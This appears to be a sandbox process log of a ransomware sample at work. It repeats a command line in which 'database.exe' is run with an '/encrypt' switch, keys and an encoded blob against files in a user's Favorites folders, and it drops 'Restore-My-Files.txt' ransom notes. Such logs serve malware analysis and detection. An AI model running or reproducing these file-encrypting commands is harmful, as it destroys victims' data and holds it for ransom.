C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\Restore-My-Files.txt"5⤵PID:4592
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\Links\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:5680
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\Links\Restore-My-Files.txt"5⤵PID:4744
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\Links\Suggested Sites.url.gif"5⤵PID:3356
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\Links\Web Slice Gallery.url.gif"5⤵PID:3012
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\Links for United States\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:2164
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\Links for United States\GobiernoUSA.gov.url.gif"5⤵PID:4460
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\Links for United States\Restore-My-Files.txt"5⤵PID:3696
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\Links for United States\USA.gov.url.gif"5⤵PID:6920
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\Microsoft Websites\IE Add-on site.url.gif"5⤵PID:6200
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\Microsoft Websites\IE site on Microsoft.com.url.gif"5⤵PID:3264
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\Microsoft Websites\Microsoft At Home.url.gif"5⤵PID:5772
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\Microsoft Websites\Microsoft At Work.url.gif"5⤵PID:3672
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\Microsoft Websites\Microsoft Store.url.gif"5⤵PID:6244
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\Microsoft Websites\Restore-My-Files.txt"5⤵PID:6108
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\MSN Websites\MSN Autos.url.gif"5⤵PID:4116
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\MSN Websites\MSN Entertainment.url.gif"5⤵PID:4864
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\MSN Websites\MSN Money.url.gif"5⤵PID:6304
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\MSN Websites\MSN Sports.url.gif"5⤵PID:6020
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\MSN Websites\MSN.url.gif"5⤵PID:4684
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\MSN Websites\MSNBC News.url.gif"5⤵PID:6040
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\MSN Websites\Restore-My-Files.txt"5⤵PID:3108
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\Windows Live\Get Windows Live.url.gif"5⤵PID:5816
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\Windows Live\Restore-My-Files.txt"5⤵PID:3728
-
-
